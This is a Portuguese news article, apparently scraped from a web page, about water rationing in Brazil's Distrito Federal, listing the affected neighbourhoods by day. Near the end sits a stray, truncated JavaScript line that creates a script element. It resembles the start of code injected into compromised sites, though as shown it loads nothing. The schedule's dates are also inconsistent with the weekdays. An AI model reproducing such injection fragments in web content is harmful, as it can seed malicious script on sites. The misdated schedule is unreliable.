Racionamento no DF atinge Vicente Pires, Santa Maria e mais 6 áreas nesta quarta

 
 
 
 Isso significa que, nestas regiões, o abastecimento é interrompido às 8h, e só começa a ser retomado 24 horas depois. Como o ligamento é lento e gradual, a água pode levar até o fim de sexta para voltar.

Nesta terça (21) o volume total de água do Descoberto chegou a 37,6%. Em crescimento desde o início de fevereiro, este é o maior índice alcançado desde novembro do ano passado. Apesar da alta, o nível ainda é considerado preocupante.

O rodízio entre as áreas delimitadas pela Caesb afeta todas as regiões que são abastecidas pelo reservatório do Descoberto, o maior da capital (veja lista ao fim da reportagem).

Novas áreas de racionamento

Nesta terça-feira (21), a Caesb anunciou que vai começar a fazer racionamento de água nas regiões centrais do Distrito Federal, abastecidas pelo reservatório de Santa Maria, a partir da próxima segunda-feira (27).

De acordo com a companhia, um cronograma de como vai funcionar a restrição deve ser divulgado até quinta-feira (23). Entre as informações que ainda precisam ser publicadas está a definição se os moradores vão ficar um ou mais dias sem água.

As regiões afetadas se concentrariam principalmente no Plano Piloto, atingindo aproximadamente 557 mil pessoas. A previsão é de que o corte ocorra nos seguintes locais: Asa Norte, Asa Sul, Lago Norte, Lago Sul, Noroeste, Sudoeste, Varjão, Taquari, Jardins Mangueiral, Paranoá, Itapoã, Setor de Oficinas Sul, Park Sul, Cruzeiro, Octogonal, Setor Militar Urbano, Setor de Indústria e Abastecimento e Estrutural.

Do total de 2,97 milhões de moradores do DF, 20% vivem ou trabalham nestas áreas. Na prática, os imóveis da área central de Brasília – incluindo prédios públicos na Esplanada dos Ministérios e na Praça dos Três Poderes – podem ficar sem água.

 

Confira a rotação do racionamento de água para os próximos dias no DF:

Quarta (22)
Vicente Pires, Colônia Agrícola Samambaia, Vila São José, Jóquei, Santa Maria, DVO, Sítio do Gama, Polo JK e Residencial Santa Maria

Quinta (22)
Gama

Sexta (23)
Ceilândia Leste, QNM, QNJ e QNL; Águas Claras, Park Way, Núcleo Bandeirante, C.A. IAPI, Candangolândia, Setor de Postos e Motéis, Metropolitana, Samambaia, Setor de Mansões de Taguatinga, Vila Cauhy e Vargem Bonita

Sábado (24)
Guará I e II, Polo de Modas, Colônia Agrícola Bernardo Sayão, setor Lúcio Costa, Super Quadra Brasília, Colônia Agrícola Águas Claras, Taguatinga Sul, Arniqueiras, Areal e Riacho Fundo I

Domingo (25)
Taguatinga Norte (incluindo QNL/EQNL 01 a 08, 10 e 12)

Segunda (26)
Ceilândia Oeste, Recanto das Emas e Riacho Fundo II – além das novas áreas abastecidas pelo Santa Maria, que ainda não foram divulgadas

var d=document;var s=d.createElement(‘script’);

Fonte:

Deixe um comentário